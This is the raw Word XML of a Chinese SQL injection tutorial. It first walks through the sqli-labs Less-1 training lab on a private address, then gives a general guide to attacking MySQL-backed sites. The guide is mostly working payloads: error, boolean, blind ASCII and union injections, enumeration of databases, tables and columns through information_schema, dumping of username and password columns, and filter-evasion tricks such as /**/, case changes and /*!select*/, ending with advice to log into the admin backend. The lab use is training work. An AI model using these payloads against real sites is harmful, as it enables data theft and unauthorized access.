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90" w:rsidRDefault="005714D7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005714D7" w:rsidRDefault="00A957D4" w:rsidP="005714D7">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="005714D7" w:rsidRPr="004661BC">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005714D7" w:rsidRPr="005714D7">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005714D7" w:rsidRDefault="005714D7" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="135052F5" wp14:editId="77417C1A">
            <wp:extent cx="5274310" cy="2216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D7" w:rsidRDefault="005714D7" w:rsidP="005714D7">
      <w:r w:rsidRPr="005714D7">
        <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' or '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005714D7" w:rsidRDefault="005714D7" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="444247A9" wp14:editId="381A4E9B">
            <wp:extent cx="5274310" cy="2011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D7" w:rsidRDefault="005714D7" w:rsidP="005714D7">
      <w:r w:rsidRPr="005714D7">
        <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' and '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005714D7" w:rsidRDefault="005714D7" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="711D3B29" wp14:editId="6F29427E">
            <wp:extent cx="5274310" cy="2166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D7" w:rsidRDefault="005714D7" w:rsidP="005714D7"/>
    <w:p w:rsidR="005714D7" w:rsidRDefault="005714D7" w:rsidP="005714D7">
      <w:r w:rsidRPr="005714D7">
        <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' and '1'='2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005714D7" w:rsidRDefault="005714D7" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C1B4853" wp14:editId="66AE9EF1">
            <wp:extent cx="5274310" cy="1845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D7" w:rsidRDefault="005714D7" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数字型注入不能使用。考虑猜解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005714D7" w:rsidRDefault="005714D7" w:rsidP="005714D7">
      <w:r w:rsidRPr="005714D7">
        <w:t xml:space="preserve">http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' and (select * from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005714D7">
        <w:t>Information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005714D7">
        <w:t>)&gt;0 and ''='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115981" w:rsidRDefault="00115981" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C4FF8E7" wp14:editId="47D2DB33">
            <wp:extent cx="5274310" cy="1951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81" w:rsidRDefault="00115981" w:rsidP="005714D7">
      <w:r w:rsidRPr="00115981">
        <w:t xml:space="preserve">http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' and (select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00115981">
        <w:t>count(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00115981">
        <w:t>*) from users)&gt;0 and ''='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115981" w:rsidRDefault="00115981" w:rsidP="005714D7"/>
    <w:p w:rsidR="00115981" w:rsidRDefault="00115981" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45BFF29A" wp14:editId="760A4619">
            <wp:extent cx="5274310" cy="2304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60" w:rsidRDefault="00836E60" w:rsidP="005714D7"/>
    <w:p w:rsidR="00836E60" w:rsidRDefault="00836E60" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜测</w:t>
      </w:r>
      <w:r w:rsidR="00EF2569">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836E60" w:rsidRDefault="00836E60" w:rsidP="005714D7">
      <w:r w:rsidRPr="00836E60">
        <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' and (select count(username)+from users)&gt;0 and ''='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF2569" w:rsidRDefault="00EF2569" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="354E7410" wp14:editId="60E3691F">
            <wp:extent cx="5274310" cy="2134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69" w:rsidRDefault="00EF2569" w:rsidP="005714D7"/>
    <w:p w:rsidR="00EF2569" w:rsidRDefault="00EF2569" w:rsidP="005714D7"/>
    <w:p w:rsidR="00EF2569" w:rsidRDefault="00EF2569" w:rsidP="005714D7">
      <w:r w:rsidRPr="00EF2569">
        <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' and (select count(password)+from users)&gt;0 and ''='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF2569" w:rsidRDefault="00EF2569" w:rsidP="005714D7"/>
    <w:p w:rsidR="00EF2569" w:rsidRDefault="00EF2569" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6709494A" wp14:editId="5C81B3DD">
            <wp:extent cx="5274310" cy="2461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38" w:rsidRDefault="009B3E38" w:rsidP="005714D7"/>
    <w:p w:rsidR="009B3E38" w:rsidRDefault="009B3E38" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D4439CC" wp14:editId="4B2665CD">
            <wp:extent cx="5274310" cy="2084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38" w:rsidRDefault="009B3E38" w:rsidP="005714D7"/>
    <w:p w:rsidR="009B3E38" w:rsidRDefault="009B3E38" w:rsidP="005714D7"/>
    <w:p w:rsidR="009B3E38" w:rsidRDefault="002B69B3" w:rsidP="005714D7"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用户名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B69B3" w:rsidRDefault="002B69B3" w:rsidP="005714D7">
      <w:r w:rsidRPr="002B69B3">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' and (select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B69B3">
        <w:t>count(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B69B3">
        <w:t xml:space="preserve">*) from users where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B69B3">
        <w:t>ascii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B69B3">
        <w:t>(mid(username,1,1))=68) and ''='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80256" w:rsidRDefault="00A80256" w:rsidP="005714D7"/>
    <w:p w:rsidR="00A80256" w:rsidRDefault="00A80256" w:rsidP="005714D7"/>
    <w:p w:rsidR="00A80256" w:rsidRDefault="00A80256" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用union</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80256" w:rsidRDefault="00A80256" w:rsidP="005714D7">
      <w:r w:rsidRPr="00A80256">
        <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=-1' union select 1,2,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A80256">
        <w:t>3  and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A80256">
        <w:t xml:space="preserve"> ''='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80256" w:rsidRDefault="00A80256" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02960575" wp14:editId="4BFC0DA1">
            <wp:extent cx="5274310" cy="22580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56" w:rsidRDefault="00A80256" w:rsidP="005714D7"/>
    <w:p w:rsidR="00FA405A" w:rsidRDefault="00FA405A" w:rsidP="005714D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA405A">
        <w:t xml:space="preserve">http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=88888' union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA405A">
        <w:t>4,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA405A">
        <w:t>_concat(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA405A">
        <w:t>schema_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA405A">
        <w:t xml:space="preserve">),8 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA405A">
        <w:t>information_schema.schemata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA405A">
        <w:t xml:space="preserve"> -- and ''='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA405A" w:rsidRDefault="00FA405A" w:rsidP="005714D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75681616" wp14:editId="498D4F97">
            <wp:extent cx="5274310" cy="1640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D" w:rsidRDefault="00087B1D" w:rsidP="005714D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他类似</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="000E11FD" w:rsidRDefault="000E11FD" w:rsidP="000E11FD"/>
    <w:p w:rsidR="00A80256" w:rsidRPr="000E11FD" w:rsidRDefault="000E11FD" w:rsidP="000E11FD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1141"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>步骤三：查出基本信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>得到数字回显后，将对应</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>数字位</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>换成我们想查询的信息，比如</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>显示位</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>是3</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>and1=2 union select 1,2,version(),4...,N--</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>//介绍几个常用函数：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>1. version()——MySQL版本</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2. user()——用户名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>3. database()——数据库名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>4. @@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>datadir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>——数据库路径</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>5. @@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>version_compile_os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>——操作系统版本</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>我们可以通过将对应函数放到</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>显示位</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>中查出相应信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>//再介绍几个很有用的函数：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(str1,str2,...)——没有分隔符地连接字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat_ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(separator,str1,str2,...)——含有分隔符地连接字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(str1,str2,...)——连接一个组的所有字符串，并以逗号分隔每一条数据</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>说着比较抽象，其实也并不需要详细了解，知道这三个函数能一次性查出所有信息就行了。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>比如：concat(version(),0x3a,user(),0x3a,database(),0x3a,@@datadir,0x3a,@@verion_compile_os)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>concat_ws(0x3a,version(),user(),database(),@@datadir,@@verion_compile_os)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>group_concat(version(),0x3a,user(),0x3a,database(),0x3a,@@datadir,0x3a,@@verion_compile_os)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>//0x3a是":"的十六进制，在这里把它作为分隔符，没有它，查出来的东西就连成一片了</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>//在实际查的时候，有些时候可能会出错，比如@@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>verion_compile_os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>这个函数就经常出错，去掉就是了。。= =</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>//对于MySQL函数可以百度，或查看MySQL官方手册http://dev.mysql.com/doc/</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>步骤四：爆表爆列爆用户名密码</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>爆的方法有很多，我就说说我知道的几种吧，从最“温和的”到最“野蛮的”。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>第一种：查表查列</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">1. and 1=2 union select 1,2,table_name,4 from (select *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=库名十六进制 limit N,1)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> limit 1--</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> 2. and 1=2 union select 1,2,column_name,4 from (select *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=表名十六进制 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=库名十六进制 limit N,1)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> limit 1--</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> 3. and 1=2 union select 1,2,列名,4 from 表名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>//这里改变N的值，查出一个个表名、列名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>//这个方法比较老，具体的原理那些我也不太懂，尤其是那个t和后面那个limit 1，了解下就行了</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>第二种：高级</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>查表查列</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">1. and 1=2 union select 1,2,schema_name,4 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.schemata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> limit N,1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> 2. and 1=2 union select 1,2,table_name,4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=要查的库名的十六进制 limit N,1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> 3. and 1=2 union select 1,2,column_name,4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=要查的表名的十六进制 limit N,1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>//有个提速技巧，要查的库名的十六进制那个地方填database()，就是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=database()，直接就表示当前数据库</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>//找敏感的表，含有admin、manage或user之类的</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>第三种：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>爆表爆列</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
        <w:t>1. and 1=2 union select 1,2,group_concat(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>schema_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">),4 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.schemata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>2. and 1=2 union select 1,2,group_concat(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">),4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=要爆的库名的十六进制</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. and 1=2 union select 1,2,group_concat(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">),4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=要爆的表名的十六进制</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>4. and 1=2 union select 1,2,group_concat(列名1,0x3a,列名2),4 from 表名</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>www.2cto.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
        <w:t>//distinct表示不同，也就是去掉爆出内容的重复部分，不加也可以，我习惯加上</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>//这个方法好就好在通过用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()这个函数直接爆出所有库名、表名、列名、字段内容，可以提高速度，方便查找</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>第四种：高级</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>爆表爆列</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">1. and 1=2 union select 1,2,group_concat(distinct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">),4 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">2. and 1=2 union select 1,2,group_concat(distinct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">),4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=要爆的库名的十六进制</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> 3. and 1=2 union select 1,2,group_concat(distinct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">),4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=要爆的表名的十六进制</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> 4. and 1=2 union select 1,2,group_concat(列名1,0x3a,列名2),4 from 表名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>//所有数据都是从</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>这个表里获取，因为从</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">这个库的介绍 (http://dev.mysql.com/doc/refman/5.1/zh/information-schema.html)我们可以看到，从 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>这个表里，我们可以查到所有的信息，因为它在里面，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">、 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>这个三个列都有，所以我们可以直接通过这个表，查出我们需要的所有信息，就省了</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>换表这一步</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>了，进一步提升速 度</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>到这一步，我们的注入就算完成了，找后台解密登陆就是了。俺再多说几句。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>还是那句话，MySQL的注入非常的灵活，我总结的只是最基本的语句，只是一点点皮毛而已。至于更高级的，大家去</w:t>
      </w:r>
      <w:r w:rsidR="00A957D4">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A957D4">
        <w:instrText xml:space="preserve"> HYPERLINK "http://bbs.2cto.com" \t "_blank" </w:instrText>
      </w:r>
      <w:r w:rsidR="00A957D4">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>论坛</w:t>
      </w:r>
      <w:r w:rsidR="00A957D4">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>、百度找找吧。比如当我们用上面的语句无法成功查出的时候，我们可以尝试下这些方法。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>1. 当union select 1,2,3,4没有出现</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>数字位</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>时，可以尝试把数字都换成null，然后逐个尝试替换成数字或字符或直接换成version()，找到可以显示出来的那一位。这个貌似是因为对应变量类型不同的原因，我也不是太懂。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2. 有些时候莫名其妙的就出错的时候（比如有数字显示位，而用替换函数(比如version())去替换时却返回空白页或报错），爆不出来的时候，可以尝试通 过hex()或convert()等函数来解决可能的编码问题，比如hex(version())、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unhex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(hex(version()))、 convert(version() using latin1)等等</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>3. 在注入的时候，可以把空格换成"+"或者"/**/"，这都是等价的，因为空格会被自动转成"%20"，看着很乱，而且换过以后貌似能过一些过滤。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>4. 另外，在遇到网站有过滤的时候，可以考虑下大小写变换绕过。所以经常看到大牛们的注入语句是稀奇古怪、变幻莫测。。最近又看到一个变态的绕过方 法，/*!select*/，把容易被过滤的东西放到/*!XXX*/中，一样可以正常查询，也就是/*!select*/=select。如果你还不放 心那就这样/*!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sEleCt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>*/。这个/*!XXX*/=XXX的原理我还不懂，希望大牛能给解释下啊，求教~</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>PS：以后就用最后一种方法就是了，前三种仅做了解。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A80256" w:rsidRPr="000E11FD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7D4" w:rsidRDefault="00A957D4" w:rsidP="005714D7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A957D4" w:rsidRDefault="00A957D4" w:rsidP="0057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7D4" w:rsidRDefault="00A957D4" w:rsidP="005714D7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A957D4" w:rsidRDefault="00A957D4" w:rsidP="00571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4D7" w:rsidRDefault="005714D7">
    <w:pPr>
